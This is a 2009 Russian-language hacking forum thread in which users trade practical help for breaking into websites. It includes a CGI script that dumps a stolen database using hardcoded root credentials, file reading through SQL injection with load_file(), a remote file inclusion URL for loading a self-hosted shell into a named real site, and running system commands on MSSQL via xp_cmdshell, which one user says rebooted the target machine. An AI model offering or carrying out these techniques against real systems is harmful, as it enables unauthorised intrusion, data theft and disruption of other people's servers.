Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Если форма прежназначена для загрузки картинок, то посмотри свойства одного из изображений, в новостях например, там будет указана папка с изображениями. Наверняка и твой файл там.
     
    #10221 Ins3t, 21 Nov 2009
    Last edited: 21 Nov 2009
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    Это вед ошибка MSSQL?
     
  3. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Strilo4ka Спасибо, руками уже пробывал - безрезультатно, буду колдовать со сканером))
    Ctacok Незнаю, изображение добавляется как скриншот в письме в саппорт о неполадке сервиса :D
     
  4. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Возможно ли через этот метод читать и записывать файлы?
     
  5. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    да
     
  6. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    А почему он должен быть закрыт, не подскажешь? :(
     
  7. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Чем можно сдампить большую БД (12кк записей)
    sypex не смог
    На сервере можно запускать cgi скрипты.

    Попробовал
    PHP:
    #!/bin/sh

    DB=forum
    USER
    =root
    PASS
    =motynub
    HOST
    =localhost

    echo "Content-Type: text/plain"
    echo "Content-Disposition: attachment; filename=$DB.sql"
    echo

    mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -"$USER-p"$PASS-h $HOST $DB
    Но вышел еррор 500 (safe_mode = ON)
     
    #10227 Byrger, 21 Nov 2009
    Last edited: 21 Nov 2009
  8. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    2 InFlame
    чтение файлов возможно, используй load_file(). Естественно для успешного чтения юзер под которым работает бд должен иметь file_priv = Y

    вывод режется до 64 символов

    остальные символы читаем с помощью функции substr()
     
    3 people like this.
  9. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    на
    Microsoft SQL Native Client error '80040e14'

    Unclosed quotation mark after the character string ''.

    /boards/boards_moderated.asp, line 19
    а на
    идеть редирект на главную страницу. Как поступит в данном случае или просто забыть про ресурс?
     
  10. Nosfer

    Nosfer New Member

    Joined:
    10 Jan 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Можно ли с этим как-либо шелл залить или тут просто фрейм и вообще лучше забить?

    Вот ссылка: http://www.pngbd.com/business/?page=http://forum.antichat.ru
     
  11. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    есть ли возможность брутить сами имена таблицы посимвольно на 4 вертке MySQL? А то тока на 5 версии есть такое возможность
     
  12. BlackPanther

    BlackPanther New Member

    Joined:
    19 Apr 2009
    Messages:
    12
    Likes Received:
    4
    Reputations:
    0
    можно
    залей на какой нить свой сайт шелл и подаставь его
    типо http://www.pngbd.com/business/?page=http://site/shell.txt

    YuNi|[c
    по моему нет, можно через различные программы для sql иньекций гонять на различные базы таблиц :(
     
    #10232 BlackPanther, 22 Nov 2009
    Last edited: 22 Nov 2009
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Это фрейм =\
     
  14. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Попробуй запустить процесс в фоновом режиме, чтобы php не дожидался его завершения.
    Вообще Sypex 2.0 может перезапускать себя для работы при safe_mode=on, проверь может ты старый использовал
     
  15. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    пробуем зайти на сайт (точнее на админку) - показывает пустую страницу (и исходный код тоже пуст). Что это за фигня? Можно как нибудь обойти?
     
  16. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    Хех Pashkela я знаю что там нету inf_sch, вед если не знаеш префикс таблицы, то бесполезно твои гадания нас чет префиксов. Если бы было возможность брутить хотябы таблицы(не колонки) посимвольно тогда было бы супер.

    ЗЫ. В ступорь не вводись ты еще нужень для поддержки мега тулзы
     
  17. Glazz

    Glazz Elder - Старейшина

    Joined:
    9 Aug 2008
    Messages:
    116
    Likes Received:
    7
    Reputations:
    0
    Имею код вида
    Code:
    <?php
    ...
    $some = $_POST[some];
    $s = mssql_query($some);
    и тут уже вывод того, что получилось.
    ?>
    Дело в том, что кавычки экранируются. Как использовать тогда
    exec master..xp_cmdshell ???
     
  18. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    часто работает exec master..xp_cmdshell [cmd]
     
    1 person likes this.
  19. Glazz

    Glazz Elder - Старейшина

    Joined:
    9 Aug 2008
    Messages:
    116
    Likes Received:
    7
    Reputations:
    0
    Большое спасибо, вроде, работает, по крайней мере машина ушла в ребут после [shutdown /f /r], но что-то не выдает результат работы запроса(допустим [dir]).
     
  20. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    для этого тебе нужно создать таблицу в которую будешь писать вывод с помощью insert into ... execute xp_cmdshell "dir" или просто перенаправлять вывод в файл
     
    1 person likes this.
Thread Status:
Not open for further replies.